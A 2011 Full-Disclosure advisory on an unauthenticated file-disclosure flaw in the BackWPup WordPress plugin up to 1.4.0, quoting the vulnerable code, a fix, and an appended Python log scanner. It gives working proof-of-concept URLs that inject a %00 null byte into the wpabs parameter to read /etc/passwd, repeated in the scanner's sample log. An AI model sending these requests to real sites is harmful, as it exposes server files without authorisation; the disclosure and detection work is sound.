[Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content disclosure

From: Danilo Massa (danilo_myahoo.com)
Date: Mon Feb 28 2011 - 09:41:19 CST

=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for
Wordpress. The plugin provides:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail

III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and possibly earlier versions too) has an
unfiltered parameter in two PHP pages that lets a remote user access
sensitive files like /etc/passwd.
No authentication required.
No plugin activation required.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the PHP pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.

Both files start by trying to include the wp-load.php file using the
wpabs parameter, which can be injected with a direct call to the page.

options-view_log-iframe.php:

    <?PHP
    if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) {
        require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
    ...

options-runnow-iframe.php:

    if (file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) {
        require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
    ...

By inserting a string terminator (%00) inside the wpabs parameter, it is
possible to specify a file name instead of a directory and have it
included in the web page.

NOTE: also the

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that
hosts Wordpress with the vulnerable plugin.

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd

Both of them will display the /etc/passwd file.

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any
text file accessible by the web application server user.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.

VIII. SOLUTION
-------------------------
Upgrade to a patched release or, as a quick workaround, enclose any
$_GET['wpabs'] in a trim call like this:

    if (file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) {

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by
Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor released an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
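A log check for the requests described in sections IV and V, added here as an example (it is not part of the original advisory or of the plugin's code). It assumes combined-format web server access logs; the sample entries are constructed, and the "review" label for a wpabs value without a NUL byte is this example's own choice.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# The two scripts named in the advisory; the site may live in a subdirectory.
SCRIPTS = (
    "/wp-content/plugins/backwpup/app/options-view_log-iframe.php",
    "/wp-content/plugins/backwpup/app/options-runnow-iframe.php",
)
# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return a finding dict for a request passing wpabs to either script, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = re.sub(r"/{2,}", "/", unquote(url.path))  # normalise encoded or doubled slashes
    if not path.endswith(SCRIPTS):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("wpabs")
    if values is None:
        return None
    # %00 decodes to NUL, which is how the advisory turns the directory prefix into a file name.
    verdict = "null-byte" if any("\x00" in v for v in values) else "review"
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "script": path.rsplit("/", 1)[-1], "wpabs": values, "verdict": verdict}

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample entries (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2011:10:00:01 +0000] "GET /wp-content/plugins/backwpup/app/'
    'options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 HTTP/1.1" 200 1532 "-" "curl"',
    '198.51.100.4 - - [01/Mar/2011:10:02:11 +0000] "GET /blog/wp-content/plugins/backwpup/app/'
    'options-view_log-iframe.php?wpabs=/var/www/blog/&logfile=job.html HTTP/1.1" 200 8040 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Mar/2011:10:03:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["verdict"], f["ip"], f["script"], f["status"], repr(f["wpabs"]))
```

A "null-byte" finding with a 200 status on a host that ran version 1.4.0 or earlier is worth following up by checking which files the web server user could read at that time.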

